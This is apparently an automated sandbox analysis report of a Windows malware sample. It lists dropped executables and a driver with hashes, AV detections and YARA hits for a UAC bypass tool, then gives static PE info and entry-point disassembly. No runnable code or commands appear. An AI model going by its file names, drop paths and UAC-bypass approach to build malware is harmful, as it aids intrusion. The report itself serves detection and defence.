Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7050.tmp.xml

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4720
Entropy (8bit):	4.483092489339483
Encrypted:	false
SSDEEP:	48:cvIwWl8zsb3NJg771I9RWrWpW8VYdYm8M4JmnFGyq85r0Jx4dgsLd:uIjfDnI7GWa7VlJ7NJx4yyd
MD5:	58496B6DBFCCE7910CD38CCCA9C005BC
SHA1:	E1223FA9B9444B11073BE14D5314F31E1A04D385
SHA-256:	1CA28B1D69DFFFB9A91FA7C27428D74B2127958C7D5CC5CF780F21A05D7BBA67
SHA-512:	DD949EE41A08B6F7CB14402FC8490FCF78EDEDDBFA896CB65CF22E0BAE3043E49F1476434B31B041912562146827272ED5FACE1B9AC37B913E45948F6E8D7940
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533602" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER706D.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	77644
Entropy (8bit):	3.0606435719020597
Encrypted:	false
SSDEEP:	768:d0K7u0xDIQd4wbWzn1mn3OOQfxd5RibBPhgx/D5:2K7u0xDIQqNy3OOQfxd5ROBPm5D5
MD5:	47441003442829816E59A5B2DCECD786
SHA1:	358B22C02C0C4654DE0A73E79C7B9F693E4FCF9D
SHA-256:	5A7594F262A5C235B084C9D3E1FD476EA90E0510A78AFF518144048B200CFE46
SHA-512:	29D055F868A074FBBD0C8B9620576D2DAC638A58B0CD5A242D6179CFC60002E8ADBE997B899DB41B1AF1441467D6F01067C029DC3931F576D0D28FA72CD3703C
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER70CC.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.695276354530462
Encrypted:	false
SSDEEP:	96:TiZYW72XHVk98YDYNoKTFdHxYEZYytCiOPaY4SLwcxODaSKV7MIlYIYwu:2ZDy/k6QvjIDaSKpMIl/Ywu
MD5:	F85DD3EC26DC0180F6CEA7E25FC7B5CF
SHA1:	302C38B9B6D4FA24D7C96585E952C42D1721E643
SHA-256:	80058868C5D7FB9811F59FB3BC909F7452FDCEF8A1944E855EA8868EC9A5AC1A
SHA-512:	33AC21D7AA96540BA9E57E69769A7F56296F48795FC0241C72FD3E19CC73AFB5F85BFA1D16AF0CFB36328605F08265B35C78A0C6ABF51F484C4F2ED79BBFB250
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GcqJPBLD2Q.exe.log

Process:	C:\Users\user\Desktop\GcqJPBLD2Q.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.357964438493834
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
MD5:	D8F8A79B5C09FCB6F44E8CFFF11BF7CA
SHA1:	669AFE705130C81BFEFECD7CC216E6E10E72CB81
SHA-256:	91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
SHA-512:	C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

Process:	C:\Windows\System32\conhost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	539
Entropy (8bit):	5.356620128167825
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1WzAbDLI4MNepQZaDAWDLI4MWuCv:ML9E4KQMsXE4Np/E4Ks
MD5:	7155C0B26CEC4BA9E8198691F0343F69
SHA1:	0C2D3811CBDA0C349203F9AAAEEF47E6DB4C0FEF
SHA-256:	59691880D1C39E4698FA89EFDA67A8EA171A039B0F6FC332EBE911F7EE790E23
SHA-512:	62A480C5AD8A978E41D29B6C03666D30569A0A7A1F8D92DA201CE839FE4578782EAEF5EF4B675306668F5813B71F2467B52AE090BDCF5313C276631DBD6E9379
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NllluljjElz:NllUE
MD5:	11E11881DB10CF040A1189171FFA58F4
SHA1:	FA0557B00771F196EF84B8274DCF7D079278811D
SHA-256:	2060C23CA036F0750DFC90E1C6D5374136E9D90262F6D125FC39BF72F75727A8
SHA-512:	C4762CDBE3A3AEDD00383855E5F4DF838B053199FC721F1600371ED177B37F8FE1C0983BC05F8CA940568034E2C66F67C586950A23E5032FED4F9A985A71BD73
Malicious:	false
Preview:	@...e.................................r.!............@..........

C:\Users\user\AppData\Local\Temp\Cool.exe

Process:	C:\Users\user\Desktop\GcqJPBLD2Q.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2234880
Entropy (8bit):	7.999703845559877
Encrypted:	true
SSDEEP:	49152:DbsShrTLQqUh8D9H7agbZXidfz8ur3kvVguyFWOSoqTmRq85:v9hP0kBOgbZkxbkvVYFWO0mg85
MD5:	DEF89B601B7DDD52A94E15DBD38EAEEF
SHA1:	EA87B102BC3A5C8979288A9FFD8AC27595E86E05
SHA-256:	1494DA12B79A3EA799839680B25359BA84EB0BE102ED93060FEA5A9F17D2323C
SHA-512:	26791781DFFFAB7B5A475ECB99BD060A6BC0E71234DDE52821CA8F98BBBC78777A4DA8FC20D3DBB4F848A5600D725D354F43AEA1CC738452B294BCF147732E45
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........."......"........@..............................P".....:.#.....................................................0+".<............@".....................................................................l+"..............................text............................... ..`.rdata..n.!..0....!.................@..@.bss.........0"..........................pdata.......@".......".............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe

Process:	C:\Users\user\Desktop\GcqJPBLD2Q.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	82432
Entropy (8bit):	6.446528321328694
Encrypted:	false
SSDEEP:	1536:qpob9UDgogvBOMc0egPgHbZ9tIz6RBHhoK31l6E:mLMogZqIP6bZEz6r6E
MD5:	83588784E36FE1894F499CAF5FAD5ED8
SHA1:	03B9E7CBBCF334A9526A776505797FF3FF73766B
SHA-256:	2E9AA76BCA1D33AFA183192E52AAAE388F2CC21AD84DB61624B08B40E88B684B
SHA-512:	8D2A4F7B141DA69AEA5DD7A823722B37E249981C5F07E6862C6B3F215C6D2DE856F679255A3C4EA9884B16BF662E0AADB96F75FD00A765FE63484DE70D0A01C9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe, Author: Joe Security Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe, Author: Florian Roth
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............J...J...J...J...J..K...J..K...J..K...J..K...J..K...J...J..J.+.K...J.+yJ...J...J...J.+.K...JRich...J................PE..d.....f.........."....).L...~......HM.........@..........................................`..................................................7..h...............t...............`....(..p............................'..@............`...............................text...vK.......L.................. ..`.rdata..:....`.......P..............@..@.data.......P.......6..............@....pdata..t............8..............@..@.rsrc................>..............@..@.reloc..`............@..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DccwBypassUAC.pdb

Process:	C:\Users\user\Desktop\GcqJPBLD2Q.exe
File Type:	MSVC program database ver 7.00, 4096*297 bytes
Category:	dropped
Size (bytes):	1216512
Entropy (8bit):	4.823628926418521
Encrypted:	false
SSDEEP:	24576:50HZ8dTqjqB85QKbS6CGFnwAS1nvvEhf:50HZ8dTqjqB85QKbSxvvEhf
MD5:	619A85E6061155BEFE3D4A544C14349D
SHA1:	37C9EAC43CF9B7872898246A719DD4251CAC235C
SHA-256:	8F25F7419C770875786875478011E4EEF0A219E916980B02FD0FCE4565DA9754
SHA-512:	9C23897F14855B796055C580D08B2CF71DCD96A29A4B5FE19748F8CD7AA763BB4BC830600531F98F3BAC9073534793C77DAC59377675CCF45058924807EF79B8
Malicious:	false
Preview:	Microsoft C/C++ MSF 7.00...DS...........)...........(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2bvc44fe.sdv.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_43dity4a.ab5.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xw53nwnr.flv.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yncfji4m.lsy.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\services64.exe

Process:	C:\Windows\System32\conhost.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2234880
Entropy (8bit):	7.999703845559877
Encrypted:	true
SSDEEP:	49152:DbsShrTLQqUh8D9H7agbZXidfz8ur3kvVguyFWOSoqTmRq85:v9hP0kBOgbZkxbkvVYFWO0mg85
MD5:	DEF89B601B7DDD52A94E15DBD38EAEEF
SHA1:	EA87B102BC3A5C8979288A9FFD8AC27595E86E05
SHA-256:	1494DA12B79A3EA799839680B25359BA84EB0BE102ED93060FEA5A9F17D2323C
SHA-512:	26791781DFFFAB7B5A475ECB99BD060A6BC0E71234DDE52821CA8F98BBBC78777A4DA8FC20D3DBB4F848A5600D725D354F43AEA1CC738452B294BCF147732E45
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........."......"........@..............................P".....:.#.....................................................0+".<............@".....................................................................l+"..............................text............................... ..`.rdata..n.!..0....!.................@..@.bss.........0"..........................pdata.......@".......".............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys

Process:	C:\Windows\System32\conhost.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	modified
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: TwrhjEKqxk.exe, Detection: malicious, Browse Filename: aA45th2ixY.exe, Detection: malicious, Browse Filename: 1mqzOM6eok.exe, Detection: malicious, Browse Filename: updater.exe, Detection: malicious, Browse Filename: 7QiAmg58Jk.exe, Detection: malicious, Browse Filename: LnK0dS8jcA.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.13032.15171.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: S0FTWARE.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe

Process:	C:\Windows\System32\conhost.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	7.58901482766096
Encrypted:	false
SSDEEP:	768:mQ+aQc5+YUYWkY2c5GnU/cf+crM2t7xCyAUf:Jnb5pJ/l+onr
MD5:	3C9FA255FE0A761E4D8535039EB86F5C
SHA1:	96AE8A31237B25A797D568BCD333C5BDF662831A
SHA-256:	B7677CB95ABC6682AA804B48587EE1ED1AF1DE992EC306B78FFE8F04673F68B3
SHA-512:	D7AFD1491E918C63CFB3ADA5290BDE5F261B7397269424E67CD91A6C8982E824F032EC314A968A258B0F9522935E292EF65D91C3F9A35239ADE89A182B4183CB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........b......."........@.............................................................................................0...<...................................................................................l................................text............................... ..`.rdata..n_...0...`..................@..@.bss.....................................pdata...............z..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.469507536644076
Encrypted:	false
SSDEEP:	6144:xzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuN3jDH5S:pZHtYZWOKnMM6bFplj4
MD5:	FB997A1D33B94FD6E6DA21B0E277D34A
SHA1:	AE9DF20621B026E338833D50A807D6B14B10387A
SHA-256:	E9512874C456A39F62092ACB9EF784C6F90D51483C0C2C772867EB9A02CA5983
SHA-512:	A6CB4406ACC812BD0C102A1F4F4566D38E8B8A54803CE34C37A72C7213264556D9688C8D2764CE4DE0077FFB9BA6870EA6C037CC482B04755E7BB48109194689
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.G...................................................................................................................................................................................................................................................................................................................................................4.'........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Process:	C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	119
Entropy (8bit):	4.460360847653456
Encrypted:	false
SSDEEP:	3:jKPX9EIIMLMW3u+DFxSoF+FL+N9OkMtF2sVa2jUgvn:gNTIKMj+DLhgqgkMt9aQn
MD5:	5FF7DCF7E909CD47FDFE031DDD3ED725
SHA1:	01405756D79C45775E0C714477CF90A02734F5A8
SHA-256:	31BFB31EC755CFF97D956A78CB86F9E6E057B0014934A5C5949C716209B6F868
SHA-512:	F6B0FCE1F7F1D01122B8210F45C9EA6D8E48E64490C42D20AB2CADE9168295A2A89E6DBAF1C1BBC2525DDEF7EDCE4244512B1D54AFA6D1E9D1330A58BADFDFF6
Malicious:	false
Preview:	[!] You already have Administrator rights! There is no need to execute the script ;).. [+] Stopping the execution.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.999748830285122
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	GcqJPBLD2Q.exe
File size:	3'598'848 bytes
MD5:	831c0b3184feb755997ee1ec5e474ca8
SHA1:	45daae9fbc40e84523ff7bf15742f6bf7bac1462
SHA256:	3deb1c82c0d030534d168b9857c7ed13815917146448e1ab6844f4a90edc2a7d
SHA512:	a19977651dbf0b14c065d6c73da429819399af31245bf83898612e910cfff6d21d21a5ddab933ed0042319864cf62ed6e48867bfde5001630e63fb0713c74693
SSDEEP:	49152:xgK8x6tinpu5GmV7HC7uaKZuJ/daqcn+kq2M6uFCnyEcv+mBnruY3+A3DbtBbgS:WK8xdIwubZu6q+eCBsruYp3X
TLSH:	75F533B7944DBA98EB1584F7C2F50370813C7F29A4B79260BA090BE95968783F84F46D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................6.........^.6.. ....7...@.. .......................@7...........@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x76ff5e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F89DB5 [Sun Sep 29 00:22:13 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
